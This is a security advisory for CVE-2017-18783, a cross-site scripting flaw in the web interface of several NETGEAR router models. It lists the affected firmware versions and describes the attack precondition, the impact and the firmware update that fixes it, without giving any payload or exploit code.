CVE-2017-18783

Vulnerability

A cross-site scripting (XSS) vulnerability exists in the web-based management interface of multiple NETGEAR router models. The flaw is present in firmware versions prior to the fixed releases listed in the advisory [1]. Affected devices include D6200 (before 1.1.00.24), D7000 (before 1.0.1.52), JNR1010v2 (before 1.1.0.44), JR6150 (before 1.0.1.12), JWNR2010v5 (before 1.1.0.44), PR2000 (before 1.0.0.20), R6020 (before 1.0.0.26), R6050 (before 1.0.1.12), R6080 (before 1.0.0.26), R6120 (before 1.0.0.36), R6220 (before 1.1.0.60), R6700v2 (before 1.2.0.12), R6800 (before 1.2.0.12), R6900v2 (before 1.2.0.12), WNDR3700v5 (before 1.1.0.50), WNR1000v4 (before 1.1.0.44), WNR2020 (before 1.1.0.44), and WNR2050 (before 1.1.0.44). The vulnerability can be triggered when an attacker injects malicious script into a page served by the router's web interface.

Exploitation

An attacker must be able to deliver a crafted URL or input to an authenticated administrator of the affected router. No special network position is required beyond the ability to trick the user into clicking a link or visiting a malicious page. The injected script executes in the context of the router's web interface, allowing the attacker to perform actions as the logged-in user.

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of an authenticated administrator. This can lead to disclosure of sensitive information (e.g., session tokens, configuration data), modification of router settings, or further attacks such as session hijacking. The impact is limited to the web interface and does not directly provide remote code execution on the device.

Mitigation

NETGEAR has released fixed firmware versions for all affected models. Users should update to the latest firmware as soon as possible by visiting the NETGEAR Support page and downloading the appropriate version for their device [1]. No workaround is available; the only mitigation is applying the firmware update.